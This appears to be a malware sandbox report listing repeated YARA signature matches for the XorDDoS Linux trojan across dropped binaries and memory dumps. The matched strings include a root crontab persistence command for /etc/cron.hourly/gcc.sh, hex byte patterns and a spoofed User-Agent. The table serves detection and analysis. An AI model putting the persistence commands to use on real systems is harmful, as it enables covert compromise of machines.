/usr/bin/uruvhkrplh	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/ghgagimgub	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/ghgagimgub	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/ghgagimgub	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/ghgagimgub	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/exnwncfijy	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/exnwncfijy	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/exnwncfijy	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/exnwncfijy	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Click to see the 58 entries

Memory Dumps

Source	Rule	Description	Author	Strings
5680.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5680.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5680.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5680.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5713.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5713.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5713.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5713.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5450.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5450.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5450.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5450.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5628.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5628.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5628.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5628.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5601.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5601.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5601.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5601.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5437.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5437.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5437.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5437.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5702.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5702.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5702.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5702.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5743.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5743.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5743.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5743.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5604.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5604.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5604.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5604.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5570.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5570.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5570.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5570.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5638.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5638.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5638.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5638.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5535.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5535.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5535.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5535.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5760.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5760.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5760.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5760.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5655.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5655.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5655.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5655.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5558.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5558.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5558.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5558.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5493.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5493.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5493.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5493.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5683.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5683.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5683.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5683.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5585.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5585.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5585.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5585.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5675.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5675.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5675.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5675.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5541.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5541.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
5541.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
5541.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
5691.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
5691.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
